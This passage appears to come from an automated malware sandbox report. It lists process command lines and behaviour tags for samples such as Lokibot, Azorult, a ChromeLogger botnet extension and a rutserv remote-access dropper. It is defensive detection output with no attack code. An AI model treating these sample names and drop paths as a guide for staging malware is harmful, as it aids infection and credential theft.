    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.10.1376230517\591675101" -childID 10 -isForBrowser -prefsHandle 3264 -prefMapHandle 5108 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {e329c6b8-c478-4799-9ebb-51ba9e96a721} 4688 tab
    - Executes dropped EXE
[depth 3] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 1140)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.11.1487429596\1724675316" -childID 11 -isForBrowser -prefsHandle 4864 -prefMapHandle 4268 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {1f9f32e9-c98f-41b1-a1c2-79872497f99e} 4688 tab
    - Executes dropped EXE
[depth 3] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 1692)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.12.967060710\744376020" -childID 12 -isForBrowser -prefsHandle 4976 -prefMapHandle 3608 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {ed6de742-ddbe-4b0a-b83a-35fcfd2da1dc} 4688 tab
    - Executes dropped EXE
[depth 3] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 4276)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.13.1919265978\770184582" -childID 13 -isForBrowser -prefsHandle 1304 -prefMapHandle 4876 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {01e76152-33fd-4dff-8372-e037df18e2c5} 4688 tab
    - Executes dropped EXE
[depth 3] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 5812)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.14.49645393\805684887" -childID 14 -isForBrowser -prefsHandle 4032 -prefMapHandle 4060 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {5607b256-a258-44f6-894c-ca0493ee2dde} 4688 tab
    - Executes dropped EXE
[depth 1] C:\Windows\system32\OpenWith.exe (PID 4132)
    C:\Windows\system32\OpenWith.exe -Embedding
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
[depth 1] C:\Windows\System32\rundll32.exe (PID 5132)
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
[depth 1] C:\Windows\System32\WScript.exe (PID 3468)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Trojan.Javascript.ChromeLogger.a.zip\botnet-browser-chrome-master\extension\js\background.js"
[depth 1] C:\Windows\System32\WScript.exe (PID 984)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Trojan.Javascript.ChromeLogger.a.zip\botnet-browser-chrome-master\extension\js\jquery-3.5.1.min.js"
[depth 1] C:\Windows\System32\WScript.exe (PID 2984)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Trojan.Javascript.ChromeLogger.a.zip\botnet-browser-chrome-master\extension\js\logger.js"
[depth 1] C:\Windows\system32\OpenWith.exe (PID 5428)
    C:\Windows\system32\OpenWith.exe -Embedding
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
[depth 2] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe (PID 4628)
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Trojan.Javascript.ChromeLogger.a.zip\botnet-browser-chrome-master\extension\manifest.json"
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
[depth 3] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 5876)
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=35927EAF8329BE2E314F1C8C24254475 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode
--service-request-channel-token=35927EAF8329BE2E314F1C8C24254475 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:14⤵PID:2856
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=95981AB388F46DF402CC7CA16E32625B --mojo-platform-channel-handle=1684 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:5740
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AFC138692A3948AFDB414F7EB096D0BE --mojo-platform-channel-handle=2320 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:4796
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1DBE671620EB936910FBB2F52B05142E --mojo-platform-channel-handle=2440 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:1308
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EFC5D60FF119B481E904994ECA58166D --mojo-platform-channel-handle=2344 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:2792
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=DE827111092AF8A1D328528783C221B1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode 
--service-request-channel-token=DE827111092AF8A1D328528783C221B1 --renderer-client-id=8 --mojo-platform-channel-handle=2400 --allow-no-sandbox-job /prefetch:14⤵PID:4132
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1012
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
PID:6048 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_Trojan.Javascript.ChromeLogger.a.zip\botnet-browser-chrome-master\README.md2⤵
- Opens file in notepad (likely ransom note)
PID:5400
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_Trojan.Javascript.ChromeLogger.a.zip\botnet-browser-chrome-master\server\bootstrap\css\bootstrap.css1⤵
- Opens file in notepad (likely ransom note)
PID:1720
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:5256 -
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\Javascript.Kaoom.Unknown.7z"2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:2396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵PID:5368
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:5352 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\Virus.BAT.Poly.7z"2⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
PID:2124 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140433⤵PID:1672
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=978CEFCA38529EE5A2B2F1F6F578BA22 --mojo-platform-channel-handle=1708 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:3252
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D570BB93F4CD7E215CD35A597C33FA83 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode 
--service-request-channel-token=D570BB93F4CD7E215CD35A597C33FA83 --renderer-client-id=2 --mojo-platform-channel-handle=1724 --allow-no-sandbox-job /prefetch:14⤵PID:4512
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=70228DA35FE3209CCAF029684FC53BCE --mojo-platform-channel-handle=1764 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:4360
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A7EE57BC473C93BBFCD20A1A4B81DE86 --mojo-platform-channel-handle=2400 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:3060
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EF81F8133A31102925AA46E38AFE9188 --mojo-platform-channel-handle=1964 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵PID:5400
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A82190EB0C6FCD8DD4A4C267254B09E0 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode 
--service-request-channel-token=A82190EB0C6FCD8DD4A4C267254B09E0 --renderer-client-id=8 --mojo-platform-channel-handle=2416 --allow-no-sandbox-job /prefetch:14⤵PID:4976
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3064 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.exe_Virus-main.zip\NoEscape.exe_Virus-main\README.md"2⤵
- Checks processor information in registry
PID:6104
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
PID:2524 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7246C9F981C5ABB3C1F74DE46D2B80BB C2⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:5596
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
PID:3876
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
PID:1556 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵PID:5612
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
- Suspicious behavior: SetClipboardViewer
PID:3980 -
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
PID:5304
-
C:\Users\Admin\Downloads\Lokibot.exe"C:\Users\Admin\Downloads\Lokibot.exe"1⤵PID:2416
-
C:\Users\Admin\Downloads\Azorult.exe"C:\Users\Admin\Downloads\Azorult.exe"1⤵PID:3316
-
C:\Users\Admin\Downloads\Lokibot.exe"C:\Users\Admin\Downloads\Lokibot.exe"1⤵
- Suspicious use of SetThreadContext
PID:1044 -
C:\Users\Admin\Downloads\Lokibot.exe"C:\Users\Admin\Downloads\Lokibot.exe"2⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:6720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3168
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:352
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:2528
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}1⤵PID:452
-
C:\Windows\system32\BackgroundTaskHost.exe"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider1⤵PID:2184
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵PID:6568
-
